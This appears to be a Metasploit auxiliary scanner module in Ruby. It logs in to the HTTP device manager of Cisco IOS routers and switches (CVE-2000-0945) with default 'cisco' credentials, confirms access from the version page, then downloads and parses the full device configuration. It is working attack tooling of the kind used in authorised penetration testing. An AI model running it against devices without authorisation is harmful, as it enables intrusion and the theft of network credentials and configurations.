GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_device_manager.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
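# Auxiliary scanner that queries the HTTP device manager of a Cisco router or
# switch and, when the device answers with an IOS banner, records the
# credential that was used and passes the returned configuration to the Cisco
# mixin for processing.
#
# Everything this module stores (credential pair, vulnerability record and the
# parsed configuration) goes through framework reporting helpers, so the
# resulting workspace should be handled as sensitive data.
class MetasploitModule < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::HttpClient

  # Include Cisco utility methods
  include Msf::Auxiliary::Cisco

  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the two basic-authentication options.
  #
  # HttpUsername and HttpPassword are both registered as required and both
  # default to 'cisco'.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Device HTTP Device Manager Access',
        'Description' => %q{
          This module gathers data from a Cisco device (router or switch) with the device manager
          web interface exposed. The HttpUsername and HttpPassword options can be used to specify
          authentication.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '1846'],
          [ 'CVE', '2000-0945'],
          [ 'OSVDB', '444'],
        ],
        'DisclosureDate' => '2000-10-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])
      ]
    )
  end

  # Checks a single host: requests the version page, and if the body carries
  # an IOS banner, stores the credential, optionally reports a vulnerability,
  # then requests the configuration page and hands its contents to
  # cisco_ios_config_eater.
  #
  # Changes from the previous revision: a missing response and a 200 response
  # without the IOS banner are now reported in verbose mode instead of being
  # dropped silently, and the URL written into the vulnerability record
  # follows the SSL option instead of always claiming http://.
  #
  # @param ip [String] target address supplied by the Scanner mixin (unused;
  #   rhost/rport are read instead)
  # @return [void]
  def run_host(ip)
    target = "#{rhost}:#{rport}"
    version_uri = '/exec/show/version/CR'
    config_uri = '/exec/show/config/CR'

    # Second argument is the request timeout in seconds.
    res = send_request_cgi({ 'uri' => version_uri, 'method' => 'GET' }, 20)

    unless res
      # Verbose only: a scanner sweep would otherwise print one line per dead host.
      vprint_error("#{target} No response from this device")
      return
    end

    if res.code == 401
      print_error("#{target} Failed to authenticate to this device")
      return
    end

    if res.code != 200
      print_error("#{target} Unexpected response code from this device #{res.code}")
      return
    end

    unless res.body.to_s.match?(/Cisco (Internetwork Operating System|IOS) Software/)
      vprint_error("#{target} Response does not contain a Cisco IOS version banner")
      return
    end

    # NOTE(review): a 200 carrying the IOS banner is treated as proof that the
    # configured credential is valid. A device that serves this path without
    # asking for authentication would presumably look the same from here, so
    # the stored credential is only as reliable as that assumption - confirm
    # when triaging results.
    print_good("#{target} Successfully authenticated to this device")
    store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])

    # Report a vulnerability only if no password was specified
    # NOTE(review): HttpPassword is registered as required with a default of
    # 'cisco', so an empty value may be rejected by option validation before
    # run_host is reached - confirm that this branch is reachable.
    if datastore['HttpPassword'].to_s.empty?
      scheme = datastore['SSL'] ? 'https' : 'http'
      report_vuln(
        {
          host: rhost,
          port: rport,
          proto: 'tcp',
          name: name,
          info: "Module #{fullname} successfully accessed #{scheme}://#{rhost}:#{rport}#{version_uri}",
          refs: references,
          exploited_at: Time.now.utc
        }
      )
    end

    config_res = send_request_cgi({ 'uri' => config_uri, 'method' => 'GET' }, 20)
    config_body = config_res ? config_res.body.to_s : ''

    # Everything after the opening FORM tag is taken as the page payload;
    # /m lets (.*) span newlines so the whole remainder is captured.
    form = config_body.match(/<FORM METHOD([^\>]+)\>(.*)/mi)
    if form
      # Drop each closing tag together with the rest of its line, leaving the
      # configuration text.
      config = form[2].gsub(/<\/[A-Z].*/i, '').strip
      print_good("#{target} Processing the configuration file...")
      # Helper is not defined in this file; presumably provided by
      # Msf::Auxiliary::Cisco. The text handed over is a full device
      # configuration, so whatever it records should be treated as sensitive.
      cisco_ios_config_eater(rhost, rport, config)
    else
      print_error("#{target} Error: could not retrieve the IOS configuration")
    end
  end
end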